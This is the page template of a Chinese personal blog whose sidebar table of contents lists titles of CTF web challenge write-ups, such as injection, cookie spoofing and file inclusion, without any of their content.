  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://upload-images.jianshu.io/upload_images/11234137-b2b20e005c98464d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="Bling_Dog">
            
              <p class="site-author-name" itemprop="name">Bling_Dog</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/PiPiChenA" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-globe"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="563667866@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-globe"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#web2"><span class="nav-number">1.</span> <span class="nav-text">web2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#计算器"><span class="nav-number">2.</span> <span class="nav-text">计算器</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web基础-GET"><span class="nav-number">3.</span> <span class="nav-text">web基础$_GET</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web基础-POST"><span class="nav-number">4.</span> <span class="nav-text">web基础$_POST</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#矛盾"><span class="nav-number">5.</span> <span class="nav-text">矛盾</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#方法1"><span class="nav-number">5.1.</span> <span class="nav-text">方法1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#方法2"><span class="nav-number">5.2.</span> <span class="nav-text">方法2</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web3"><span class="nav-number">6.</span> <span class="nav-text">web3</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#你必须让他停下"><span class="nav-number">7.</span> <span class="nav-text">你必须让他停下</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#本地包含"><span class="nav-number">8.</span> <span class="nav-text">本地包含</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#变量1"><span class="nav-number">9.</span> <span class="nav-text">变量1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web5"><span class="nav-number">10.</span> <span class="nav-text">web5</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#头等舱"><span class="nav-number">11.</span> <span class="nav-text">头等舱</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#网站被黑"><span class="nav-number">12.</span> <span class="nav-text">网站被黑</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web4"><span class="nav-number">13.</span> <span class="nav-text">web4</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#flag在index里面"><span class="nav-number">14.</span> <span class="nav-text">flag在index里面</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#输入密码查看flag"><span class="nav-number">15.</span> <span class="nav-text">输入密码查看flag</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#点击一百万次"><span class="nav-number">16.</span> <span class="nav-text">点击一百万次</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#备份是个好习惯"><span class="nav-number">17.</span> <span class="nav-text">备份是个好习惯</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#成绩单"><span class="nav-number">18.</span> <span class="nav-text">成绩单</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#秋名山老司机"><span class="nav-number">19.</span> <span class="nav-text">秋名山老司机</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#速度要快"><span class="nav-number">20.</span> <span class="nav-text">速度要快</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#cookie欺骗"><span class="nav-number">21.</span> <span class="nav-text">cookie欺骗</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#过狗一句话"><span class="nav-number">22.</span> <span class="nav-text">过狗一句话</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#前女友"><span class="nav-number">23.</span> <span class="nav-text">前女友</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#login1-SKCTF"><span class="nav-number">24.</span> <span class="nav-text">login1(SKCTF)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#各种绕过"><span class="nav-number">25.</span> <span class="nav-text">各种绕过</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web8"><span class="nav-number">26.</span> <span class="nav-text">web8</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Insert-into注入"><span class="nav-number">27.</span> <span class="nav-text">Insert into注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#神奇的登陆框"><span class="nav-number">28.</span> <span class="nav-text">神奇的登陆框</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PHP-encrypt-1-ISCCCTF"><span class="nav-number">29.</span> <span class="nav-text">PHP_encrypt_1(ISCCCTF)</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bling_Dog</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/click.js"></script>

